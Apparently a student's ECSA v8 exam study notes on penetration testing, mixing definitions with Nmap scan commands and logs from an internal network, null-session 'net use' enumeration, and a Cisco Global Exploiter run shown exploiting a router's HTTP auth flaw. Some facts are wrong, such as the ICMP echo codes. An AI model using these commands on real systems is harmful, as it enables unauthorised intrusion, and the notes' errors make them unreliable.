SAnalysis-0001- ECSAV8

Rough hints v8

ECSA V8 key Learnings Hints for Exam

[email protected] Hints Manju Devaraj

ECSA v8

Key learnings/ Take away for Exam

By : Manju Devaraj

Data leaks -> Rogue Employee & Insider Attacker

More than 75% of Budget --> is Non IT/Security

Core Focus in IT security -> AAA & CIA & Non Repudiation .

Risk = loss * exposure factor

IDLE scan - Packet sent to Zombie Computer Open port - packet with PID 31400 ,response will be 31401

.

Metamorphic Virus- code rewrites & signature changes ,but Functionality stays same .

Policies - Promiscuous Policy , Permissive Policy , Prudent, Paranoid policy

Prudent Security Policy Provides max security , all sevices are blocked , nothing is allowed , everything

is logged .

Permissive Security policy Policy begins Wide Open, known dangers & attacks are blocked , impossible

to keep up with current exploits .

Port nos above 1024 , registered for vendor specific applications .

Until 1024 are Well known ports .

Positive acknowledgment with retransmission guarantees reliable delivery of data .

Windowing Improve flow Control & reliability

TCP header fields, IDS , NIDS , IP Fragmentation .to be prepared

Dos Syn Flooding takes advantage of flaw in hosts implement 3 way handshakes.

IDS evasion Techniques are modifications made to attack in order to prevent detection by an IDS.

WIDSs monitors & evaluate user & system activities, identify known attacks, determine abnormal

activity , determine abnormal network activity , policy violation over WLAN , Spoofing & MITM attack .

Password cracking attacks

Rough hints v8

Rough hints v8



Dictionary Dictionary db loaded

Bruteforce tries every combination.

Hybrid works like dictionary but adds some nos & symbols to words in dictionary.

Syllable Combination of Brute force & dictionary

Rule based used when attacker gets some info about password.

____________________________

Passwords are hashed & stored in SAM located in windows\systems32\config\SAM

Linux

/etc/passwd or /etc/shadow

Rainbow tables contains pre-computed hashes of Passwords . Precompiled hash table .

Social Engineering Types

Vishing Scamming users to surrender private info using telephone lines.

Dumpster diving Searching info in disposal areas still yet to be destroyed .

Shoulder Surfing Looking over shoulder to gain/gather info.

Phishing Using fake websites to redirect, emails contains suspicious attachments.

Accomplice method is associated with bribing , handing out gifts , personally involving to

become a friend .

Identity Theft Stealing your name or personal info for fraudulent purpose

Web 2.0 provides more attack surface for web exploitation , SQL injection is the biggest threat to web

2.0

Web spidering tools like Burp Suite used to mirror a target website.

Web Parameter tampering attack involves manipulation of parameters exchanged between client &

server in order to modify application data such as user credential & permissions, price & quantity of

products. Best way to protect web applications from this is to apply effective input field filtering

SQL injection takes advantage of non-validated input vulnerabilities to pass SQL commands through a

Rough hints v8

Rough hints v8



web application.

LDAP injection attacks are similar to SQL injection attack but exploit user parameter to generate LDAP

query .

In SOAP injection attack, attacker injects malicious query strings into the user filed to bypass Service

authentication mechanisms & access backend db .

Functional Testing falls within the scope of black box testing; & its now required to have the knowledge

of inner design of the code or logic.

SQL injection Vulnerabilities:

Detect SQL injection issues

Detect input Sanitization

Detect Truncation issues

Detect SQL modification issues

Challenges to IT Security .

Environment complexity - Insecure Network Design , Multivendor Environment

New Technologies - Tunnel to Bypass access Controls .

New Threats & Exploits - Avg every 4 hours new threats are discovered .

Limited focus on Security .

Limited security expertise .

Environmental Complexity

firewalk

Tries to discover firewall rules using an IP TTL expiration technique known as firewalking.

nmap --script=firewalk --traceroute 64.54.40.3.2

nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1

nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms

While doing Pen Test

Create a log of all actions , results & Findings.

Rough hints v8

Rough hints v8



http/1.1 error page msg code 407 - > Proxy Auth required

ICMP

Type 3 Code 3 -> Dest port unreachable

Type 3 Code 2 -> Dest protocol unreachable

Type 3 code 13 -> adminstratively blocked

Type 0 Code 0 - echo reply

Type 0 code 8 - Echo Request

Codes:

0 Net Unreachable

1 Host Unreachable

2 Protocol Unreachable

3 Port Unreachable

4 Fragmentation Needed and Don't Fragment was Set

5 Source Route Failed

6 Destination Network Unknown

7 Destination Host Unknown

Pentest is actively evaluating the security of an information system or network by simulating an attack .

Goes one step further then vulnerability testing .Adapts indept ethical hacking .

Blue Team - Test ran with the knowledge of org's IT staff .

Red Team - Pentest ran Without knowledge of (informing the) IT staff , but with conscent of Upper

Mgmt .

Pen Testing Types

Black box - Blind testing & doube blind - no knowldg of infra. before .

white Box - Announced & unannounced - Has completed knowldg of infra.

Grey Box - Combination of Black box & unannounced testing - Limited knowl.

Pen Test Phases

Rough hints v8

Rough hints v8



Pre-attack Phase - Passive Reconnaissance & Active reconn

Attack Phase - Perimiter , Web Application & Wireless Testing ..etc

Post attack phase -Removing all files & cleaning registry

Network Security Assessment Activity in Attack phase - > Identifies Vulnerabilities & helps to improve

Enterprise Security Policy .

Application Security Assessment -> Source code Review , Authorization Testing , Functionality Testing ,

Web penetration Testing .

Legal Agreement - > Scope of project & Consent of Company .

Rule of Engagement/behavior -> requires Signature from both Pen tester & the Company .

Pen Test Pricing Report -> No. of Client Computer/IP's to be Tested & Resource Required , Time to Finish

the project .

Tiger Team -> A Group of People hired to give details of the Vulnerabilities present in the system .

Passive info gathering - >From Public Sources Eg: Using Netcraft

Active info Gath -> Social engineering , on-site visits , face -to face interviews & Tools . Eg : Using

Nessus ( makes too much noise ) .

Nessus - Scripting launguage is NASL which can be used to create Custom Scripts .

Filetype:ppt -> finds ppts on Google

Gramm-Leach-Bliley Act - > protect consumers personal financial information held by financial

institutions and their service providers .

Family Educational Rights and Privacy Act (FERPA) for Students.

Active IDS - IDS cuts off your connection ,when running a vulnerability scan on a network .

Google Search hackrouter.com -> will produce all sites that links to the hackrouter.com .

XMAS scan most of the ports scanned do not give a response - Porsts are in Open state .

DNS Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR).

>dig example.com axfr

When a DNS zone transfer is allowed, you should get a complete listing of all DNS entries that have been

made in the DNS server for this domain. If the DNS server doesn't allow it, you will get an error

indicating that the Zone transfer didn't work.

Rough hints v8

Rough hints v8



Source & Destination port in TCP header 16 bits - > 2^16 = 65536

Ack no./Sequence No. -> 32 Bit

Winxp Repair Risk ->Pressing Shift+F10 gives the user administrative rights.

Null Session hijacking

>net use \\10.10.2.225\ipc$ "" "/user:"

>net use

Glean information - ith a null session connection, you can now use other utilities to gather critical

Windows information remotely. Dozens of tools can gather this type of information.

net view \\10.10.2.225

Winfo and DumpSec can gather useful information about users and configurations, such as

Windows domain to which the system belongs

Security policy settings

Local usernames

Drive shares

Countermeasures against null session hacks

Block NetBIOS on your Windows server by preventing these TCP ports from passing through your

network firewall or personal firewall:

139 (NetBIOS sessions services)

Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's

Restrict anonymous connections to the system.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value

as follows:

Rough hints v8

Rough hints v8



None: This is the default setting.

Rely on Default Permissions (Setting 0): This setting allows the default null session connections.

Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security

level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as

Walksam to garner information from the system.

No Access without Explicit Anonymous Permissions (Setting 2): This high security setting

prevents null session connections and system enumeration.

Nmap Vulnerability scanning

nmap -sV --script=vulscan www.example.com Rough hints v8

Rough hints v8



@echo Courtesy manju Devaraj

cd C:\Program Files\Nmap

cmd /c nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 10.186.27.1-254 >

c:\temp\10.186.27.0.txt

nmap -iL c:\temp\ips.txt -sn -PS

Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)

Host is up (0.00s latency).

MAC Address: 00:50:56:A5:1C:F5 (VMware)

Nmap scan report for 10.186.27.5


MAC Address: 00:50:56:A5:56:F4 (VMware)

Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)


MAC Address: 00:50:56:A5:75:57 (VMware)

Rough hints v8

Rough hints v8



Nmap done: 9 IP addresses (3 hosts up) scanned in 3.25 seconds

#########################################################

HOST DISCOVERY:

-PO[protocol list]: IP Protocol Ping

-Pn: Treat all hosts as online -- skip host discovery

##########################################################

nmap -iL c:\temp\ips.txt -sn -P0

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:46 Eastern Standard


Host is up.


Host is up.


Host is up.


Host is up.


Host is up.


Host is up.


Host is up.


Host is up.


Rough hints v8

Rough hints v8



Host is up.


nmap -iL c:\temp\ips.txt -P0 -sU -p139,445,139,80 -v

C:\Program Files\Nmap>nmap -iL c:\temp\ips.txt -P0 -sU -p1-500

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time



Not shown: 495 closed ports

PORT STATE SERVICE

123/udp open|filtered ntp

137/udp open netbios-ns

138/udp open|filtered netbios-dgm

161/udp open|filtered snmp

500/udp open|filtered isakmp

MAC Address: 00:50:56:A5:1C:F5 (VMware)




PORT STATE SERVICE





162/udp open|filtered snmptrap

Rough hints v8

Rough hints v8



445/udp open|filtered microsoft-ds


MAC Address: 00:50:56:A5:56:F4 (VMware)




PORT STATE SERVICE






MAC Address: 00:50:56:A5:75:57 (VMware)


nmap -v -sn 192.168.0.0/16 10.0.0.0/8

nmap -v -iR 10000 -Pn -p 80

! iR - > random Targets

nmap -iL c:\temp\ips.txt -P0 -sU -p1-1024 -vv -sV -O

! UDP scan - port range , double verbose , SV - probe to determine version of service , version of OS

Xmas scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

These three scan types are exactly the same in behavior except for the TCP flags set in probe packets. If

a RST packet is received, the port is considered closed, while no response means it is open|filtered. The

port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.

C:\Program Files\Nmap>nmap -sR 10.186.27.12 -P0 -sT -p1-1024 -vv -sV -O

Rough hints v8

Rough hints v8



WARNING: -sR is now an alias for -sV and activates version detection as well as

RPC scan.

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 06:31 Eastern Standard Time

NSE: Loaded 23 scripts for scanning.

Initiating ARP Ping Scan at 06:31

Scanning 10.186.27.12 [1 port]

Completed ARP Ping Scan at 06:31, 0.06s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 06:31

Completed Parallel DNS resolution of 1 host. at 06:31, 0.00s elapsed

Initiating Connect Scan at 06:31

Scanning 10.186.27.12 [1024 ports]

Discovered open port 135/tcp on 10.186.27.12



Completed Connect Scan at 06:32, 45.91s elapsed (1024 total ports)

Initiating Service scan at 06:32

Scanning 3 services on 10.186.27.12

Completed Service scan at 06:32, 6.03s elapsed (3 services on 1 host)

Initiating OS detection (try #1) against 10.186.27.12

NSE: Script scanning 10.186.27.12.

NSE: Starting runlevel 1 (of 1) scan.



Scanned at 2013-11-13 06:31:59 Eastern Standard Time for 53s

Not shown: 1021 filtered ports

Rough hints v8

Rough hints v8



PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn

445/tcp open netbios-ssn

MAC Address: 00:50:56:A5:75:3A (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 o

pen and 1 closed port

Device type: general purpose

Running: Microsoft Windows 7|2008

OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:mic

rosoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8

TCP/IP fingerprint:

OS:SCAN(V=6.40%E=4%D=11/13%OT=135%CT=%CU=34426%PV=Y%DS=1%DC=D%G=N%M=005056%

OS:TM=52836364%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I

OS:%II=I%SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B

OS:4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%

OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=

OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q

OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%

OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%

OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%

OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD

OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 7.366 days (since Tue Nov 05 21:45:37 2013)

Rough hints v8

Rough hints v8



Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=258 (Good luck!)

IP ID Sequence Generation: Incremental

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: C:\Program Files\Nmap

OS and Service detection performed. Please report any incorrect results at http:

//nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds

Raw packets sent: 17 (1.446KB) | Rcvd: 17 (1.358KB)

C:\Program Files\Nmap>

Form Scalpel used for Dissecting HTML Forms , tool can extract all HTML forms from pages .

BackTrack to exploit Cisco IOS vlunerability

root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl

Usage :

perl cge.pl

Vulnerabilities list :

[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

[2] - Cisco IOS Router Denial of Service Vulnerability

[3] - Cisco IOS HTTP Auth Vulnerability

[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

[6] - Cisco 675 Web Administration Denial of Service Vulnerability

[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

Rough hints v8

Rough hints v8



[9] - Cisco 514 UDP Flood Denial of Service Vulnerability

[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability

[11] - Cisco Catalyst Memory Leak Vulnerability

[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability

[13] - 0 Encoding IDS Bypass Vulnerability (UTF)

[14] - Cisco IOS HTTP Denial of Service Vulnerability

root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3

Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...

/level/$NUMBER/exec/show/config/cr

where $NUMBER is an integer between 16 and 99.

root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....

http://10.10.0.21/level/99/exec/show/config

Click cancel to the logon box and enter the following address:

Error! Hyperlink reference not valid.

Information technology risk

Risk = Threat Vulnerability Asset Value

Rough hints v8

Rough hints v8



Fuzzing Attack - Injection Technique

A fuzzer is a program which injects automatically semi-random data into a program/stack and detect

bugs.

The Fuzzing Scan does just as described above; it generates totally random input for the specified

request parameters for a specified number of requests, hoping to provoke some kind of unexpected . By

default the generated values will be between 5 and 15 characters in lenght and mutated 100 times;

Rough hints v8

Rough hints v8



Inputting Massive Amount of Data to Crash the Web Application .

Dumb Fuzz Testing

Smart Fuzz Testing - Knowing underlying structure of database supply huge inputs

accoordingly .

Rough hints v8

Rough hints v8



Anonymiser - can be used to get around the Blocked access

Information Vulnerability - Job Posting's other postings exposing the information about the Technology

.

Citrix Server's Port - 2598 is used to scan a network to find the Citrix machines .

Stacheldraht

The original DDOS tool "Stacheldraht" - a German word means 'Barbed wires' - is released during the

middle of 1999.

The Stacheldraht works on most Solaris and Linux system. The original Stacheldraht, written by hacker

'randomizer', was found to be running on most of the Solaris platform because the Linux version is quite

broken.

Stacheldraht by itself is a malicious program that covers its track within a compromised system and

communicates by covert channel and encryption on the network. The attacker could control hundreds

or thousands of compromised system via a single command line interface and launch different types of

DDOS attack to victim afterward. It combines the features available from Trinoo, TFN and adds some

new DDOS attacks.

http://packetstormsecurity.com/distributed

Common Vulnerabilities and Exposures (CVE) - Submit the IDS Logs for any new vulnerability .

Software Firewalls operate at DLL .

Rough hints v8

SAnalysis-0001- ECSAV8

Documents

permissive policy

policy violation

web applications

web exploitation

web parameter

policies promiscuous

private info

personal info